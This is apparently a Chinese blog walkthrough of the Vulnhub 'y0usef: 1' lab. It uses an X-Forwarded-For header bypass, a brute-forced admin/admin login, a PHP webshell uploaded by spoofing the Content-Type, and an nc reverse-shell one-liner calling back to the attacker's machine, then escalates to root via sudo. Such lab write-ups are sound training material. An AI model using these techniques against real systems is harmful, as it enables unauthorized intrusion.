Vulnhub y0usef: 1

y0usef: 1

基本信息

难度:简单 操作比较容易,但是有的地方需要开一开脑洞,发挥一下想象力
Vulnhub y0usef: 1

靶机搭建

下载镜像导入成功1运行之后会显示该界面

Vulnhub y0usef: 1

链接:https://www.vulnhub.com/entry/y0usef-1,624/

主机发现与端口扫描

因为靶机与kali在同一个网段下可以使用nmap扫描获取靶机地址

nmap 192.168.56.0/24 

发现靶机地址为192.168.56.105
对改地址进行详细的端口扫描

nmap -sV -p- -A 192.168.56.105 

获取到开放了22,80端口以及版本信息

Vulnhub y0usef: 1

访问80端口发现页面中没有什么可以利用的信息
Vulnhub y0usef: 1

使用dirb进行扫描但是没有发现可利用信息,可能是字典不够强大
Vulnhub y0usef: 1

换一个工具再试一下,使用dirsearch进行扫描,发现存在301重定向页面

Vulnhub y0usef: 1

访问查看一下
Vulnhub y0usef: 1
可以尝试一下通过burp抓包增加一个请求头看看能否实现重定向
请求头:X-Forwarded-For:127.0.0.1
Vulnhub y0usef: 1

成功进入到登录界面

Vulnhub y0usef: 1

可以使用burp进行暴力破解
使用最常用的top100字典进行破解就可以
破解之后发现这是最简单的弱口令密码
注:需要添加请求头才可以

Vulnhub y0usef: 1

发现账号和密码都是admin,进行登录
登录成功,发现可以上传文件,尝试上传木马使用哥斯拉进行连接
Vulnhub y0usef: 1发现直接长传.php文件会被过滤

Vulnhub y0usef: 1使用burp修改数据包进行绕过,一般当Content-Type为图片类型时可以成功上传
这里使用image/png进行修改
上传成功获得路径
http://192.168.56.105/adminstration/upload/files/16127499112.php
Vulnhub y0usef: 1

使用哥斯拉进行连接
成功连接
Vulnhub y0usef: 1

获取shell

进入命令行反弹shell,使用nc进行连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 1234>/tmp/f 

成功反弹shell
Vulnhub y0usef: 1建立交互式shell

python -c 'import pty;pty.spawn("/bin/bash")' 

在home目录下发现user.txt进行查看发现是base64加密

Vulnhub y0usef: 1

解密之后获得账号与密码

Vulnhub y0usef: 1

user : yousef
pass : yousef123
通过ssh建立远程连接获取一个稳定的操作环境
Vulnhub y0usef: 1

提权

sudo -l 

查看可使用命令

Vulnhub y0usef: 1

发现yousef可以执行所有命令
直接su root 获取root权限
成功提权
Vulnhub y0usef: 1

进入root目录下获取最后一个flag

Vulnhub y0usef: 1

解密之后获取答案
Vulnhub y0usef: 1

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论